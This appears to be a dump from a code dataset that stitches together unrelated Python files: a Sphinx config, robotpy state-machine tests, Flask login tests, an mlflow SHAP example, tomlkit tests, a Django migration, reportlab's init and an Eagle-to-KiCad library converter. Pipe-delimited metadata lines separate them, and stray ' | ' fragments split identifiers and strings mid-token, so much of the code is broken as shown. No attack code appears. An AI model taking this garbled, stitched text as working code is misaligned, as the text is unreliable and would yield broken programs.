# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# | top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are | copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'parlogserdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'parlogser.tex',
u'parlogser Documentation',
u'Jonathan D. Lettvin', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'parlogser',
u'parlogser Documentation',
[u'Jonathan D. Lettvin'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'parlogser',
u'parlogser Documentation',
u'Jonathan D. Lettvin',
'parlogser',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If fa |
robotpy/robotpy-wpilib-utilities | tests/test_magicbot_sm.py | Python | bsd-3-clause | 13,059 | 0.003293 | from magicbot.state_machine import (
default_state,
state,
timed_state,
AutonomousStateMachine,
StateMachine,
IllegalCallError,
NoFirstStateError,
MultipleFirstStatesError,
MultipleDefaultStatesError,
InvalidStateName,
)
from magicbot.magic_tunable import setup_tunables
import pytest
def test_no_timed_state_duration():
with pytest.raises(TypeError):
class _TM(StateMachine):
@timed_state()
def tmp(self):
pass
def test_no_start_state():
class _TM(StateMachine):
pass
with pytest.raises(NoFirstStateError):
_TM()
def test_multiple_first_states():
class _TM(StateMachine):
@state(first=True)
def tmp1(self):
pass
@state(first=True)
def tmp2(self):
pass
with pytest.raises(MultipleFirstStatesError):
_TM()
def test_sm(wpitime):
class _TM(StateMachine):
def __init__(self):
self.executed = []
def some_fn(self):
self.executed.append("sf")
@state(first=True)
def first_state(self):
self.executed.append(1)
self.next_state("second_state")
@timed_state(duration=1, next_state="third_state")
def second_state(self):
self.executed.append(2)
@state
def third_state(self):
self.executed.append(3)
sm = _TM()
setup_tunables(sm, "cname")
sm.some_fn()
# should not be able to directly call
with pytest.raises(IllegalCallError):
sm.first_state()
assert sm.current_state == ""
assert not sm.is_executing
sm.engage()
assert sm.current_state == "first_state"
assert not sm.is_executing
sm.execute()
assert sm.current_state == "second_state"
assert sm.is_executing
# should not change
sm.engage()
assert sm.current_state == "second_state"
assert sm.is_executing
sm.execute()
assert sm.current_state == "second_state"
assert sm.is_executing
wpitime.step(1.5)
sm.engage()
sm.execute()
assert sm.current_state == "third_state"
assert sm.is_executing
sm.engage()
sm.execute()
assert sm.current_state == "third_state"
assert sm.is_executing
# should be done
sm.done()
assert sm.current_state == ""
assert not sm.is_executing
# should be able to start directly at second state
sm.engage(initial_state="second_state")
sm.execute()
assert sm.current_state == "second_state"
assert sm.is_executing
wpitime.step(1.5)
sm.engage()
sm.execute()
assert sm.current_state == "third_state"
assert sm.is_executing
# test force
sm.engage()
sm.execute()
assert sm.current_state == "third_state"
assert sm.is_executing
sm.engage(force=True)
assert sm.current_state == "first_state"
assert sm.is_executing
sm.execute()
sm.execute()
assert not sm.is_executing
assert sm.current_state == ""
assert sm.executed == ["sf", 1, 2, 3, 3, 2, 3, 3, 1]
def test_sm_inheritance():
class _TM1(StateMachine):
@state
def second_state(self):
self.done()
class _TM2(_TM1):
@state(first=True)
def first_state(self):
self.next_state("second_state")
sm = _TM2()
setup_tunables(sm, "cname")
sm.engage()
assert sm.current_state == "first_state"
sm.execute()
assert sm.current_state == "second_state"
sm.execute()
assert sm.current_state == ""
def test_must_finish(wpitime):
class _TM(StateMachine):
def __init__(self):
self.executed = []
@state(first=True)
def ordinary1(self):
self.next_state("ordinary2")
self.executed.append(1)
@state
def ordinary2(self):
self.next_state("must_finish")
self.executed.append(2)
@state(must_finish=True)
def must_finish(self):
self.executed.append("mf")
@state
def ordinary3(self):
self.executed.append(3)
self.next_state_now("timed_must_finish")
@timed_state(duration=1, must_finish=True)
def timed_must_finish(self):
self.executed.append("tmf")
sm = _TM()
setup_tunables(sm, "cname")
sm.engage()
sm.execute()
sm.execute()
| assert sm.current_state == ""
assert not sm.is_executing
sm.engage()
sm.execute()
sm.engage()
sm.execute()
sm.execute()
sm.execute()
assert sm.current_state == "must_finish"
assert sm.is_executing
sm.next_state("ordinary3")
sm.engage( | )
sm.execute()
assert sm.current_state == "timed_must_finish"
sm.execute()
assert sm.is_executing
assert sm.current_state == "timed_must_finish"
for _ in range(7):
wpitime.step(0.1)
sm.execute()
assert sm.is_executing
assert sm.current_state == "timed_must_finish"
wpitime.step(1)
sm.execute()
assert not sm.is_executing
assert sm.executed == [1, 1, 2, "mf", "mf", 3] + ["tmf"] * 9
def test_autonomous_sm():
class _TM(AutonomousStateMachine):
i = 0
VERBOSE_LOGGING = False
@state(first=True)
def something(self):
self.i += 1
if self.i == 6:
self.done()
sm = _TM()
setup_tunables(sm, "cname")
sm.on_enable()
for _ in range(5):
sm.on_iteration(None)
assert sm.is_executing
sm.on_iteration(None)
assert not sm.is_executing
for _ in range(5):
sm.on_iteration(None)
assert not sm.is_executing
assert sm.i == 6
def test_autonomous_sm_end_timed_state(wpitime):
class _TM(AutonomousStateMachine):
i = 0
j = 0
VERBOSE_LOGGING = False
@state(first=True)
def something(self):
self.i += 1
if self.i == 3:
self.next_state("timed")
@timed_state(duration=1)
def timed(self):
self.j += 1
sm = _TM()
setup_tunables(sm, "cname")
sm.on_enable()
for _ in range(5):
wpitime.step(0.7)
sm.on_iteration(None)
assert sm.is_executing
for _ in range(5):
wpitime.step(0.7)
sm.on_iteration(None)
assert not sm.is_executing
assert sm.i == 3
assert sm.j == 2
def test_next_fn():
class _TM(StateMachine):
@state(first=True)
def first_state(self):
self.next_state(self.second_state)
@state
def second_state(self):
self.done()
sm = _TM()
setup_tunables(sm, "cname")
sm.engage()
assert sm.current_state == "first_state"
sm.execute()
assert sm.current_state == "second_state"
sm.engage()
sm.execute()
assert sm.current_state == ""
def test_next_fn2(wpitime):
class _TM(StateMachine):
@state
def second_state(self):
pass
@timed_state(first=True, duration=0.1, next_state=second_state)
def first_state(self):
pass
sm = _TM()
setup_tunables(sm, "cname")
sm.engage()
sm.execute()
assert sm.current_state == "first_state"
assert sm.is_executing
wpitime.step(0.5)
sm.engage()
sm.execute()
assert sm.current_state == "second_state"
assert sm.is_executing
sm.execute()
assert sm.current_state == ""
assert not sm.is_executing
def test_mixup():
from robotpy_ext.autonomous import state as _ext_state
from robotpy_ext.autonomous import timed_state as _ext_timed_state
with pytest.raises(RuntimeError) as exc_info:
class _SM1(StateMachine):
@_ext_state(first=True)
def the_state(self):
pass
assert isinstance(exc_info.value.__cause__, TypeError)
with pytest.raises(RuntimeError) as exc_info:
class _SM2(StateMachine):
@_ext_timed_state(first=True, duration=1)
def the_state(self):
pass
assert isinstance(exc_info.value.__cause__, TypeError |
ashishb/python_dep_generator | setup.py | Python | mit | 604 | 0.019868 | from setuptools import setup
setup(name='python_dep_generator',
version='0.1',
description='Generates python code dependency graph',
url='http | s://github.com/ashishb/python_dep_generator',
author='Ashish Bhatia',
author_email='ashishbhatia.ab@gmail.com',
license='MIT',
packages=['python_dep_generator'],
# install_requires=['argparse', 'importlib', 'inspect', 'logging', 'sys'] | ,
entry_points = {
'console_scripts': ['generate-dep=python_dep_generator.generate_dep:main'],
},
zip_safe=False)
|
kdheepak89/power-grid-helper | tests/test_functional.py | Python | bsd-3-clause | 4,009 | 0.000249 | # -*- coding: utf-8 -*-
"""Functional tests using WebTest.
See: http://webtest.readthedocs.org/
"""
from flask import url_for
from power_grid_helper.user.models import User
from .factories import UserFactory
class TestLoggingIn:
"""Login."""
def test_can_log_in_returns_200(self, user, testapp):
"""Login successful."""
# Goes to homepage
res = testapp.get('/')
# Fills out login form in navbar
form = res.forms['loginForm']
form['username'] = user.username
form['password'] = 'myprecious'
# Submits
res = form.submit().follow()
assert res.status_code == 200
def test_sees_alert_on_log_out(self, user, testapp):
"""Show alert on logout."""
res = testapp.get('/')
# Fills out login form in navbar
form = res.forms['loginForm']
form['username'] = user.username
form['password'] = 'myprecious'
# Submits
res = form.submit().follow()
res = testapp.get(url_for('public.logout')).follow()
# sees alert
assert 'You are logged out.' in res
def test_sees_error_message_if_password_is_incorrect(self, user, testapp):
"""Show error if password is incorrect."""
# Goes to homepage
res = testapp.get('/')
# Fills out login form, password incorrect
form = res.forms['loginForm']
form['username'] = user.username
form['password'] = 'wrong'
# Submits
res = form.submit()
# sees error
assert 'Invalid password' in res
def test_sees_error_message_if_username_doesnt_exist(self, user, testapp):
"""Show error if username doesn't exist."""
# Goes to homepage
res = testapp.get('/')
# Fills out login form, password incorrect
form = res.forms['loginForm']
form['username'] = 'unknown'
form['password'] = 'myprecious'
# Submits
res = form.submit()
# sees error
assert 'Unknown user' in res
class TestRegistering:
"""Register a user."""
def test_can_register(self, user, testapp):
"""Register a new user."""
old_count = len(User.query.all())
# Goes to homepage
res = testapp.get('/')
# Clicks Create Account button
res = res.click('Create account')
# Fills out the form
form = res.forms['registerForm']
form['username'] = 'foobar'
form['email'] = 'foo@bar. | com'
form['password'] = 'secret'
form['confirm'] = 'secret'
# Submits
res = form.submit().follow()
assert res.status_ | code == 200
# A new user was created
assert len(User.query.all()) == old_count + 1
def test_sees_error_message_if_passwords_dont_match(self, user, testapp):
"""Show error if passwords don't match."""
# Goes to registration page
res = testapp.get(url_for('public.register'))
# Fills out form, but passwords don't match
form = res.forms['registerForm']
form['username'] = 'foobar'
form['email'] = 'foo@bar.com'
form['password'] = 'secret'
form['confirm'] = 'secrets'
# Submits
res = form.submit()
# sees error message
assert 'Passwords must match' in res
def test_sees_error_message_if_user_already_registered(self, user, testapp):
"""Show error if user already registered."""
user = UserFactory(active=True) # A registered user
user.save()
# Goes to registration page
res = testapp.get(url_for('public.register'))
# Fills out form, but username is already registered
form = res.forms['registerForm']
form['username'] = user.username
form['email'] = 'foo@bar.com'
form['password'] = 'secret'
form['confirm'] = 'secret'
# Submits
res = form.submit()
# sees error
assert 'Username already registered' in res
|
pculture/unisubs | utils/one_time_data.py | Python | agpl-3.0 | 1,410 | 0.004255 | # Amara, universalsubtitles.org
#
# Copyright (C) 2017 Participatory Culture Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see
# http://www.gnu.org/licenses/agpl-3.0.html.
import uuid
from django.conf import settings
from django.core.cache import cache
from django.urls impo | rt reverse
def _mk_key(token):
return "one-time-data-" + token
def set_one_time_data(data):
token = str(uuid.uuid4())
key = _mk_key(token)
cache.set(key, data, 60)
retur | n '{}://{}{}'.format(settings.DEFAULT_PROTOCOL,
settings.HOSTNAME,
reverse("one_time_url", kwargs={"token": token}))
def get_one_time_data(token):
key = _mk_key(token)
data = cache.get(key)
# It seems like Brightcove wants to hit it twice
# cache.delete(key)
return data
|
mlflow/mlflow | examples/shap/multiclass_classification.py | Python | apache-2.0 | 964 | 0.002075 | import os
import numpy as np
from sklearn.datasets import load_iris
from sklearn.ensemble import RandomForestClassifier
import shap
import mlflow
# prepare training data
X, y = load_iris(return_X_y=True, as_frame=True)
# train a model
model = RandomForestClassifier()
model.fit(X, y)
# log an explanation
with mlflow.start_run() as run:
mlflow.shap.log_explanation(model.predict_pr | oba, X)
# list artifacts
client = mlflow.tracking.MlflowClient()
artifact_path = "model_explanations_shap"
artifacts = [x.path for x in client.list_artifacts(run.info.run_id, artifact_path)]
print("# artifacts:")
print(artifacts)
# load back the logged explanation
dst_path = client.download_artifacts(run.info.run_id, artifact_path)
base_va | lues = np.load(os.path.join(dst_path, "base_values.npy"))
shap_values = np.load(os.path.join(dst_path, "shap_values.npy"))
# show a force plot
shap.force_plot(base_values[0], shap_values[0, 0, :], X.iloc[0, :], matplotlib=True)
|
sdispater/tomlkit | tests/test_write.py | Python | mit | 437 | 0 | from tomlkit import dumps
from tomlkit import loads
def test_write_backslash():
| d = {"foo": | "\\e\u25E6\r"}
expected = """foo = "\\\\e\u25E6\\r"
"""
assert expected == dumps(d)
assert loads(dumps(d))["foo"] == "\\e\u25E6\r"
def test_escape_special_characters_in_key():
d = {"foo\nbar": "baz"}
expected = '"foo\\nbar" = "baz"\n'
assert expected == dumps(d)
assert loads(dumps(d))["foo\nbar"] == "baz"
|
euhackathon/commission-today-api | backend/backend/migrations/0006_auto_20141203_0021.py | Python | mit | 1,218 | 0 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('backend', '0005_organization_registered'),
]
operations = [
migrations.RemoveField(
model_name='organization',
name='lobbyists_with_access',
),
migrations.AlterField(
model_name='organization',
name='explore_url',
field=models.CharField(max_length=128, blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='organization',
name='lobbyists',
field=models.IntegerField(null=True, blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='organization',
name='money',
field=models.IntegerField(null=True, bl | ank=True),
preserve_default=True,
| ),
migrations.AlterField(
model_name='organization',
name='name',
field=models.CharField(max_length=128, null=True, blank=True),
preserve_default=True,
),
]
|
praus/Label-Big-Mail | big_mail_labeler.py | Python | mit | 3,890 | 0.006684 | #!/usr/bin/env python
import argparse
import email
import bisect
try:
from imapclient import IMAPClient
except ImportError:
import sys
print >>sys.stderr, """This script requires IMAPClient, a convenient Python IMAP library.
http://imapclient.freshfoo.com/
You can install it using PyPI:
(sudo) pip install imapclient
or EasyInstall:
(sudo) easy_install IMAPClient
"""
sys.exit(1)
parser = argparse.ArgumentParser(description='Big Mail Labeler')
parser.add_argument('username', action="store", help='IMAP username.')
parser.add_argument('-t', '--threshold', action="store", dest="threshold", default=2*1024**2, type=int,
help="What constitutes big message, messages bigger than this will be labeled. Units are in bytes, default is 2MB (default: %(default)s)")
parser.add_argument('--print', action="store_true", dest="print_msgs", default=False,
help='Prints the big messages. (default: %(default)s)')
parser.add_argument('--no-label', action="store_true", dest="no_label", default=False,
help='Disable labeling of messages. Just print them. (default: %(default)s)')
parser.add_argument('-p', '--password', action="store", dest="password",
help='IMAP password, if you leave this out, you\'ll be asked by getpass instead.')
parser.add_argument('-l', '--label', action="store", dest="label", default="Big",
help='Name of the "big message" label. (default: %(default)s)')
parser.add_argument('-f', '--folder', action="store", dest="folder", default='[Gmail]/All Mail',
help='IMAP folder to scan. This should ideally contain all messages, like gmail\'s All Mail. (default: %(default)s)')
parser.add_argument('-s', '--server', action="store", dest="host", default="imap.gmail.com",
help='IMAP server name (default: %(default)s)')
parser.add_argument('--nossl', action="store_false", dest="ssl", default=True,
help='Do not connect using SSL. (default: %(default)s)')
options = parser.parse_args()
if not options.password:
import getpass
options.password = getpass.getpass("Please enter your IMAP password: ")
server = IMAPClient(options.host, ssl=options.ssl, use_uid=True)
print server.login(options.username, options.password)
select_info = server.select_folder(options.folder)
print '%d messages in IMAP folder %s' % (select_info['EXISTS'], options.folder)
print "Fetching message metadata"
messages = server.search(['NOT DELETED'])
response = server.fetch(messages, ['RFC822.HEADER', 'RFC822.SIZE', 'INTERNALDATE'])
print "Messages fetched, sorting..."
by_size = sorted(list(response.viewitems()), key=lambda m: m[1]['RFC822.SIZE'])
sizes = [ m[1]['RFC822.SIZE'] for m in by_size ]
# select msgs that are bigger than threshold
bigger = bisect.bisect_right(sizes, options.threshold) # index of the first message bigger than threshold
big_messages = by_size[bigger:]
print "There are %d messages bigger than %s" % (len(big_messages), options.thresh | old)
big_uids = [ msg[0] for msg in big_messages ]
def print_messages():
print "\n--- Messages bigger than {}: ".format(options.threshold).ljust(80, '-')
print "Format: <date> | <size> | <from> | <subject>"
for msgid, data in big_messages:
headers = email.message_from_string(data['RFC822.HEADER'])
size = data['RFC822.SIZE']
date = data['INTERNALDATE']
print "{} | {} | {} | {}".format(date, size, headers['from'], headers['subject'])
if not options.no | _label:
print "Labeling big messages with label %s" % options.label
server.create_folder(options.label)
server.copy(big_uids, options.label)
print "Your messages larger than {} bytes have been labeled with label {}".format(options.threshold, options.label)
if options.print_msgs or options.no_label:
print_messages()
|
ridgek/shunter | tests/test_application.py | Python | bsd-3-clause | 1,174 | 0.000852 | from StringIO import StringIO
import unittest
from shunter.request import HTTPRequest
import mockapp
class TestApplication(unittest.TestCase):
def setUp(self):
self.app = mockapp.application
def test_get_response(self):
request = HTTPRequest({'REQUEST_METHOD': 'GET',
| 'PATH_INFO | ': '',
'Content-Type': 'text/plain'})
response = self.app.get_response(request)
self.assertEqual(response.content.read(), 'Hello World!')
self.assertEqual(response.status, 200)
request = HTTPRequest({'REQUEST_METHOD': 'GET',
'PATH_INFO': 'not/a/path',
'Content-Type': 'text/plain'})
response = self.app.get_response(request)
self.assertEqual(response.status, 404)
request = HTTPRequest({'REQUEST_METHOD': 'GET',
'PATH_INFO': 'broken',
'Content-Type': 'text/plain',
'wsgi.errors': StringIO()})
response = self.app.get_response(request)
self.assertEqual(response.status, 500)
|
l33tdaima/l33tdaima | pr1662e/array_strings_are_equal.py | Python | mit | 950 | 0.002105 | from typing import List
class Solution:
def arrayStringsAreEqualV1(self, word1: List[str], word2: List[str]) -> bool:
return "".join(word1) == "".join(word2)
def arrayStringsAreEqualV2(self, word1: List[str], word2: List[str]) -> bool:
def generator(word: List[str]):
for s in word:
for c in s:
yield c
yield None
for c1, c2 in zip(generator(word1), generator(word2)):
if c1 != c2:
return False
return True
# TESTS
for word1, word2, expected in [
(["ab", "c"], ["a", "bc"], Tr | ue),
(["a", "cb"], ["ab", "c"], False),
(["abc", "d", "defg"], | ["abcddefg"], True),
]:
sol = Solution()
actual = sol.arrayStringsAreEqualV1(word1, word2)
print("Array strings", word1, "and", word2, "are equal ->", actual)
assert actual == expected
assert sol.arrayStringsAreEqualV1(word1, word2) == expected
|
Hackerfleet/hfos | isomer/hfos/core.py | Python | agpl-3.0 | 1,475 | 0 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# HFOS - Hackerfleet Operating System
# ===================================
# Copyright (C) 2011-2019 Heiko 'riot' Weinen <riot@c-base.org> and others.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your | option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affe | ro General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
__author__ = "Heiko 'riot' Weinen"
__license__ = "AGPLv3"
"""
Module: HFOS Core
=================
"""
from isomer.component import ConfigurableComponent, handler
from isomer.database import objectmodels
from isomer.events.system import authorized_event
class HFOSCore(ConfigurableComponent):
"""
Hackerfleet Operating System core component
"""
channel = 'isomer-web'
configprops = {
}
def __init__(self, *args):
"""
Initialize the HFOS Core.
:param args:
"""
super(HFOSCore, self).__init__("HFOSCore", *args)
self.log("Started")
|
tomhsx/django-inventory | inventory/urls.py | Python | mit | 242 | 0 | from django.conf.urls import patterns, include, url
from django.contrib import a | dmin
admin.autodiscover()
urlpatterns = patterns(
'',
url(r'^$', 'inventory.views.home', name='home'),
| url(r'^admin/', include(admin.site.urls)),
)
|
TaskEvolution/Task-Coach-Evolution | taskcoach/taskcoachlib/thirdparty/src/reportlab/__init__.py | Python | gpl-3.0 | 1,715 | 0.00758 | #Copyright ReportLab Europe Ltd. 2000-2012
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/__init__.py
__version__=''' $Id$ '''
__doc__="""The Reportlab PDF generation library."""
Version = "2.7"
import sys
if sys.version_info[0:2] < (2, 7):
warning = """The trunk of reportlab currently requires Python 2.7 or higher.
This is being done to let us move forwards with 2.7/3.x compatibility
with the minimum of baggage.
ReportLab 2.7 was the last packaged ver | sion to suppo0rt Python 2.5 an | d 2.6.
Python 2.3 users may still use ReportLab 2.4 or any other bugfixes
derived from it, and Python 2.4 users may use ReportLab 2.5.
Python 2.2 and below need to use released versions beginning with
1.x (e.g. 1.21), or snapshots or checkouts from our 'version1' branch.
Our current plan is to remove Python 2.5 compatibility on our next release,
allowing us to use the 2to3 tool and work on Python 3.0 compatibility.
If you have a choice, Python 2.7.x is best long term version to use.
"""
raise ImportError("reportlab needs Python 2.5 or higher", warning)
def getStory(context):
"This is a helper for our old autogenerated documentation system"
if context.target == 'UserGuide':
# parse some local file
import os
myDir = os.path.split(__file__)[0]
import yaml
return yaml.parseFile(myDir + os.sep + 'mydocs.yaml')
else:
# this signals that it should revert to default processing
return None
def getMonitor():
import reportlab.monitor
mon = reportlab.monitor.ReportLabToolkitMonitor()
return mon
|
taejoonlab/taejoonlab-toolbox | PopGen/dominant_nucl.py | Python | gpl-3.0 | 2,301 | 0.010865 | #dominant
import os
folder = sys.argv[1]
def make_file_list(input_dir):
file_list = []
input_file_list = os.listdir | (input_dir)
for input_file in input_file_list:
if input_file[-8:] == '.cluster':
file_list.append(input | _file)
return file_list
file_list = make_file_list(folder)
for each_file in file_list:
with open(folder + each_file,'r') as f:
print each_file
clustername = each_file.replace('.cluster','')
sample = each_file.split('_')[1]
sample_name = each_file.split('.')[0]
uniq = open('dom_{}'.format(clustername),'w')
tmp_name = []
seq_dic = []
for line in f: #indel is not considered (hard to compare further)
if len(line.strip()) <171:
continue
name,seq = line.split()
if name.startswith('cluster'):
tmp_record = ''
if len(seq_dic)>1:
for i in range(len(seq_dic[1])):
tmp_seq = ''
for j in range(len(seq_dic)): #tmp_seq containt every nucleotide from same position of reads in one cluster
tmp_seq += seq_dic[j][i]
#record most frequently shown nucleotide as fasta format
max_base = max(tmp_seq.count('A'),tmp_seq.count('T'),tmp_seq.count('G'),tmp_seq.count('C'),tmp_seq.count('-'))
max_a = tmp_seq.count('A')
max_g = tmp_seq.count('G')
max_t = tmp_seq.count('T')
max_c = tmp_seq.count('C')
if max_base == max_a:
tmp_record += 'A'
elif max_base == max_g:
tmp_record += 'G'
elif max_base == max_t:
tmp_record += 'T'
elif max_base == max_c:
tmp_record += 'C'
if len(tmp_record) == 101:
uniq.write('>{}\n{}\n'.format(tmp_name[0].split('*')[0],tmp_record))
tmp_name = []
seq_dic = []
else:
tmp_name.append(name)
seq_dic.append(seq)
|
frouty/odoogoeen | extra-addons/aeroo/report_aeroo_sample/__init__.py | Python | agpl-3.0 | 1,534 | 0.000652 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2008-2011 Alistek Ltd (http://www.alistek.com) All Rights Reserved.
# General contacts <info@alistek.com>
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Sof | tware Foundation; either version 3
# of t | he License, or (at your option) any later version.
#
# This module is GPLv3 or newer and incompatible
# with OpenERP SA "AGPL + Private Use License"!
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
from .report import parser
|
rekka/intro-fortran-2016 | web/python/implicit_euler.py | Python | mit | 1,047 | 0.002865 | import math
import nu | mpy as np
import matplotlib
matplotlib.use('SVG')
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
x1 = 2.
x = np.linspace(0, x1, 100)
ax.plot(x, np.exp(-5. * x), linewidth=2, label = '$x(t)$')
N = 4
h = x1 / N
sx = np.linspace(0, x1, N + 1)
sy = [(1 + 5. * h)**(-n) for n in range(N + 1)]
ax.plot(sx, sy, marker='.', markersize=10, label='$x_i$')
for i in range(1, N):
ax.plot(x, np.exp(-5. * x) * sy[i] / math.exp(-5. * sx[i]), '--')
ax.spines['right'].set_visible(False) |
ax.spines['top'].set_visible(False)
ax.spines['bottom'].set_bounds(0, x1)
plt.tick_params(
axis='y',
which='both',
left='on',
right='off',
labelleft='off')
ax.xaxis.set_ticks_position('bottom')
ax.set_xticks(sx)
ax.set_xticklabels(["$t_{}$".format(i) for i in range(N+1)])
ax.set_xlim((0 - 0.05, x1 + 0.05))
ax.set_ylim((-0.05, 1.1 * max(np.abs(sy))))
ax.set_ylabel('$x$', rotation=0)
ax.yaxis.set_label_coords(-0.025, 1.0)
ax.legend(frameon=False, loc='upper right')
plt.savefig('../img/implicit_euler.svg')
|
Pecacheu/Eagle2Kicad | Library/Library.py | Python | mit | 3,113 | 0.008352 | '''
Created on Apr 3, 2012
@author: Dan
'''
from Common.Converter import *
from Common.Module import *
from Common.Symbol import DevicePart
from Common.Device import Deviceset
class Library(object):
__slots__ = ("name", "modules", "symbols", "converter", "deviceparts")
def __init__(self, node, name, converter=None):
self.name = name
if converter is None:
converter = Converter()
symConverter = SchemConverter()
self.modules = []
self.deviceparts = []
devicesetsLst = []
symbolsHash = {}
packages = node.find("packages").findall("package")
if packages != None:
for package in packages:
self.modules.append(Module(package, converter))
devicesets = node.find("devicesets").findall("deviceset")
if devicesets != None:
for deviceset in devicesets:
ds = Deviceset(deviceset, symConverter)
devicesetsLst.append(ds)
symbols = node.find("symbols").findall("symbol")
if symbols != None and len(devicesetsLst) != 0: #strange if not?
for symbol in symbols:
sn = symbol.get("name")
if sn in symbolsHash:
print("The symbol with the same name %s already exists!" % sn)
els | e:
symbolsHash[sn] = symbol
for deviceset in devicesetsLs | t: #strange if not?
#just iterater over all posible device packages
for device in deviceset.getDevices():
#we have to create a number of symbols to match diffrent pin configurations
#the real name of device is <deviceset> name plus name of <device>
#symlink is just a scheme representation of the set of devices or devicessts
device.setFullName(deviceset.name)
dp = DevicePart(device, symbolsHash, deviceset.getGates(), symConverter)
self.deviceparts.append(dp)
def writeLibrary(self, modFile=None, symFile=None, docFile=None):
if modFile != None:
self.writeModFile(modFile)
if symFile != None:
self.writeSymFile(symFile)
if docFile != None: #not used at the moment
self.writeDocFile(docFile)
def writeModFile(self, modFile):
